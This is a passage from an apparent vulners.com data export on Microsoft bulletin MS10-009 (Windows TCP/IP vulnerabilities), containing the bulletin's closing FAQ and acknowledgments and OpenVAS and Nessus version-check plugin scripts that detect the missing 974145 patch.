to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows TCP/IP stack not properly handling malformed TCP SACK values.\r\n\r\nWhat is TCP/IP? \r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.\r\n\r\nWhat is TCP/IP Selective Acknowledgement (SACK)? \r\nSelective acknowledgment (SACK) is used for connections with large TCP window sizes. When SACK is enabled, if a packet or series of packets is dropped the receiver can inform the sender of exactly which data has been received and where the holes in the data are. The sender can then selectively retransmit the missing data without needing to retransmit blocks of data that have already been received successfully. Prior to SACK, which was added to the Windows TCP/IP stack in Microsoft Windows 2000, a receiver could only acknowledge the latest sequence number of contiguous data that had been received, or the left edge of the receive window. For more information about SACK, see the MSDN article, Windows TCP Implementation Features.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could cause an affected system to become non-responsive.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could exploit the vulnerability by sending a system a small number of specially crafted TCP packets with a malformed selective acknowledgment (SACK) value.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll affected operating systems are at risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by correcting the manner in which the Windows TCP/IP stack handles malformed TCP SACK values.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSumit Gwalani, Drew Hintz, and Neel Mehta of Google Security Team for reporting the ICMPv6 Router Advertisement Vulnerability (CVE-2010-0239)\r\n\u2022\t\r\n\r\nSumit Gwalani, Drew Hintz, and Neel Mehta of Google Security Team for reporting the Header MDL Fragmentation Vulnerability (CVE-2010-0240)\r\n\u2022\t\r\n\r\nSumit Gwalani, Drew Hintz, and Neel Mehta of Google Security Team for reporting the ICMPv6 Route Information Vulnerability (CVE-2010-0241)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (February 9, 2010): Bulletin published.", "modified": "2010-02-09T00:00:00", "published": "2010-02-09T00:00:00", "id": "SECURITYVULNS:DOC:23198", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23198", "title": "Microsoft Security Bulletin MS10-009 - Critical Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "Multiple memory corruptions in ICMPv6, IPSec, TCP implementations.", "modified": "2010-02-10T00:00:00", "published": "2010-02-10T00:00:00", "id": "SECURITYVULNS:VULN:10601", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10601", "title": "Microsoft Windows TCP/IP and TCP/IPv6 multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:40:07", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.", "modified": "2019-05-03T00:00:00", "published": "2010-11-25T00:00:00", "id": "OPENVAS:1361412562310801479", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801479", "title": "Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801479\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-11-25 08:29:59 +0100 (Thu, 25 Nov 2010)\");\n script_cve_id(\"CVE-2010-0239\", \"CVE-2010-0240\", \"CVE-2010-0241\",\n \"CVE-2010-0242\");\n script_bugtraq_id(38061, 38062, 38063, 38064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/38506/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0342\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms10-009.mspx\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary\n code with system privileges. Failed exploit attempts will likely result in\n denial-of-service conditions.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name:\"insight\", value:\"The flaws are due to Windows TCP/IP stack,\n\n - not performing the appropriate level of bounds checking on specially crafted\n 'ICMPv6' Router Advertisement packets.\n\n - fails to properly handle malformed Encapsulating Security Payloads (ESP) over\n UDP datagram fragments while running a custom network driver that splits the\n UDP header into multiple MDLs, which could be exploited by remote attackers\n to execute arbitrary code by sending specially crafted IP datagram fragments\n to a vulnerable system.\n\n - not performing the appropriate level of bounds checking on specially crafted\n ICMPv6 Route Information packets, which could be exploited by remote\n attackers to execute arbitrary code by sending specially crafted ICMPv6\n packets to a vulnerable system.\n\n - not properly handling TCP packets with a malformed selective acknowledgment\n (SACK) value.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"974145\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\",\n item:\"PathName\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\System32\\drivers\\tcpip.sys\");\n\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:57", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.", "modified": "2017-02-20T00:00:00", "published": "2010-11-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801479", "id": "OPENVAS:801479", "title": "Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms10-009.nasl 5364 2017-02-20 13:26:07Z cfi $\n#\n# Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute arbitrary\n code with system privileges. Failed exploit attempts will likely result in\n denial-of-service conditions.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\";\ntag_insight = \"The flaws are due to Windows TCP/IP stack,\n - not performing the appropriate level of bounds checking on specially crafted\n 'ICMPv6' Router Advertisement packets.\n - fails to properly handle malformed Encapsulating Security Payloads (ESP) over\n UDP datagram fragments while running a custom network driver that splits the\n UDP header into multiple MDLs, which could be exploited by remote attackers\n to execute arbitrary code by sending specially crafted IP datagram fragments\n to a vulnerable system.\n - not performing the appropriate level of bounds checking on specially crafted\n ICMPv6 Route Information packets, which could be exploited by remote\n attackers to execute arbitrary code by sending specially crafted ICMPv6\n packets to a vulnerable system.\n - not properly handling TCP packets with a malformed selective acknowledgment\n (SACK) value.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms10-009.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.\";\n\nif(description)\n{\n script_id(801479);\n script_version(\"$Revision: 5364 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 14:26:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-25 08:29:59 +0100 (Thu, 25 Nov 2010)\");\n script_cve_id(\"CVE-2010-0239\", \"CVE-2010-0240\", \"CVE-2010-0241\",\n \"CVE-2010-0242\");\n script_bugtraq_id(38061, 38062, 38063, 38064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38506/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0342\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms10-009.mspx\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n## Check Hotfix MS10-009\nif(hotfix_missing(name:\"974145\") == 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\",\n item:\"PathName\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\System32\\drivers\\tcpip.sys\");\n\n## Get File Version\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for tcpip.sys version < 6.0.6001.18377\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for tcpip.sys version < 6.0.6002.18160\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep tcpip.sys version < 6.0.6001.18377\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for tcpip.sys version < 6.0.6002.18160\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T09:17:56", "bulletinFamily": "scanner", "description": "The remote Windows host has the following vulnerabilities in its\nTCP/IP implementation :\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Router\n Advertisement packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0239)\n\n - Specially crafted Encapsulating Security Payloads (ESP)\n are not processed properly. A remote attacker could\n exploit this to execute arbitrary code. (CVE-2010-0240)\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Route\n Information packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0241)\n\n - Specially crafted TCP packets with a malformed\n selective acknowledgment (SACK) value can cause the\n system to stop responding and automatically restart. A\n remote attacker could exploit this to cause a denial of\n service. (CVE-2009-0242)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS10-009.NASL", "href": "https://www.tenable.com/plugins/nessus/44419", "published": "2010-02-09T00:00:00", "title": "MS10-009: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44419);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-0239\", \"CVE-2010-0240\", \"CVE-2010-0241\", \"CVE-2010-0242\");\n script_bugtraq_id(38061, 38062, 38063, 38064);\n script_xref(name:\"IAVA\", value:\"2010-A-0030\");\n script_xref(name:\"MSFT\", value:\"MS10-009\");\n script_xref(name:\"MSKB\", value:\"974145\");\n\n script_name(english:\"MS10-009: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)\");\n script_summary(english:\"Checks version of tcpip.sys\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has multiple vulnerabilities in its TCP/IP\nimplementation.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host has the following vulnerabilities in its\nTCP/IP implementation :\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Router\n Advertisement packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0239)\n\n - Specially crafted Encapsulating Security Payloads (ESP)\n are not processed properly. A remote attacker could\n exploit this to execute arbitrary code. (CVE-2010-0240)\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Route\n Information packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0241)\n\n - Specially crafted TCP packets with a malformed\n selective acknowledgment (SACK) value can cause the\n system to stop responding and automatically restart. A\n remote attacker could exploit this to cause a denial of\n service. (CVE-2009-0242)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-009\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows Vista and 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(94, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-009';\nkbs = make_list(\"974145\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'0,2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"974145\";\n\nif (\n # Vista SP0 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6000.16973\", min_version:\"6.0.6000.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6000.21175\", min_version:\"6.0.6000.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8 SP1 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6001.18377\", min_version:\"6.0.6001.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6001.22577\", min_version:\"6.0.6001.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8 SP2 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6002.18160\", min_version:\"6.0.6002.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6002.22283\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:58:04", "bulletinFamily": "scanner", "description": "According to the version number obtained by NTLM the\nremote host has Windows Server 2008 installed. The host\nmay be vulnerable to a number of vulnerabilities including\nremote unauthenticated code execution.", "modified": "2019-12-02T00:00:00", "id": "WIN_SERVER_2008_NTLM_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/108811", "published": "2018-04-03T00:00:00", "title": "Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108811);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2008-0015\",\n \"CVE-2008-0020\",\n \"CVE-2008-4038\",\n \"CVE-2008-4114\",\n \"CVE-2008-4250\",\n \"CVE-2008-4609\",\n \"CVE-2008-4835\",\n \"CVE-2009-0086\",\n \"CVE-2009-0089\",\n \"CVE-2009-0550\",\n \"CVE-2009-0901\",\n \"CVE-2009-1925\",\n \"CVE-2009-1926\",\n \"CVE-2009-1930\",\n \"CVE-2009-2493\",\n \"CVE-2009-2494\",\n \"CVE-2009-2505\",\n \"CVE-2009-3676\",\n \"CVE-2009-3677\",\n \"CVE-2009-3678\",\n \"CVE-2010-0020\",\n \"CVE-2010-0021\",\n \"CVE-2010-0022\",\n \"CVE-2010-0231\",\n \"CVE-2010-0239\",\n \"CVE-2010-0240\",\n \"CVE-2010-0241\",\n \"CVE-2010-0242\",\n \"CVE-2010-0269\",\n \"CVE-2010-0270\",\n \"CVE-2010-0476\",\n \"CVE-2010-0477\",\n \"CVE-2010-1263\",\n \"CVE-2010-2550\",\n \"CVE-2010-2551\",\n \"CVE-2010-2552\"\n );\n script_bugtraq_id(\n 31179,\n 31545,\n 31647,\n 31874,\n 33121,\n 33122,\n 34435,\n 34437,\n 34439,\n 35558,\n 35585,\n 35828,\n 35832,\n 35982,\n 35993,\n 36265,\n 36269,\n 36989,\n 37197,\n 37198,\n 38049,\n 38051,\n 38054,\n 38061,\n 38062,\n 38063,\n 38064,\n 38085,\n 39312,\n 39336,\n 39339,\n 39340,\n 40237,\n 40574,\n 42224,\n 42263,\n 42267\n );\n script_xref(name:\"CERT\", value:\"827267\");\n script_xref(name:\"IAVA\", value:\"2008-A-0081\");\n script_xref(name:\"IAVA\", value:\"2009-A-0077\");\n script_xref(name:\"IAVA\", value:\"2009-A-0126\");\n script_xref(name:\"IAVA\", value:\"2010-A-0030\");\n script_xref(name:\"IAVB\", value:\"2009-B-0037\");\n script_xref(name:\"CERT\", value:\"180513\");\n script_xref(name:\"CERT\", value:\"456745\");\n script_xref(name:\"EDB-ID\", value:\"6463\");\n script_xref(name:\"EDB-ID\", value:\"6824\");\n script_xref(name:\"EDB-ID\", value:\"7104\");\n script_xref(name:\"EDB-ID\", value:\"7132\");\n script_xref(name:\"EDB-ID\", value:\"9108\");\n script_xref(name:\"EDB-ID\", value:\"16615\");\n script_xref(name:\"EDB-ID\", value:\"14607\");\n script_xref(name:\"MSFT\", value:\"MS08-063\");\n script_xref(name:\"MSFT\", value:\"MS08-067\");\n script_xref(name:\"MSFT\", value:\"MS09-001\");\n script_xref(name:\"MSFT\", value:\"MS09-013\");\n script_xref(name:\"MSFT\", value:\"MS09-037\");\n script_xref(name:\"MSFT\", value:\"MS09-042\");\n script_xref(name:\"MSFT\", value:\"MS09-048\");\n script_xref(name:\"MSFT\", value:\"MS09-071\");\n script_xref(name:\"MSFT\", value:\"MS10-009\");\n script_xref(name:\"MSFT\", value:\"MS10-012\");\n script_xref(name:\"MSFT\", value:\"MS10-020\");\n script_xref(name:\"MSFT\", value:\"MS10-043\");\n script_xref(name:\"MSFT\", value:\"MS10-054\");\n script_xref(name:\"MSFT\", value:\"MS10-083\");\n script_xref(name:\"MSKB\", value:\"957095\");\n script_xref(name:\"MSKB\", value:\"958644\");\n script_xref(name:\"MSKB\", value:\"958687\");\n script_xref(name:\"MSKB\", value:\"960803\");\n script_xref(name:\"MSKB\", value:\"967723\");\n script_xref(name:\"MSKB\", value:\"960859\");\n script_xref(name:\"MSKB\", value:\"973354\");\n script_xref(name:\"MSKB\", value:\"973507\");\n script_xref(name:\"MSKB\", value:\"973540\");\n script_xref(name:\"MSKB\", value:\"973815\");\n script_xref(name:\"MSKB\", value:\"973869\");\n script_xref(name:\"MSKB\", value:\"974318\");\n script_xref(name:\"MSKB\", value:\"971468\");\n script_xref(name:\"MSKB\", value:\"974145\");\n script_xref(name:\"MSKB\", value:\"980232\");\n script_xref(name:\"MSKB\", value:\"979687\");\n script_xref(name:\"MSKB\", value:\"982214\");\n script_xref(name:\"MSKB\", value:\"2032276\");\n\n script_name(english:\"Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)\");\n script_summary(english:\"Checks the OS version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host may allow remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version number obtained by NTLM the\nremote host has Windows Server 2008 installed. The host\nmay be vulnerable to a number of vulnerabilities including\nremote unauthenticated code execution.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure the appropriate patches have been applied.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 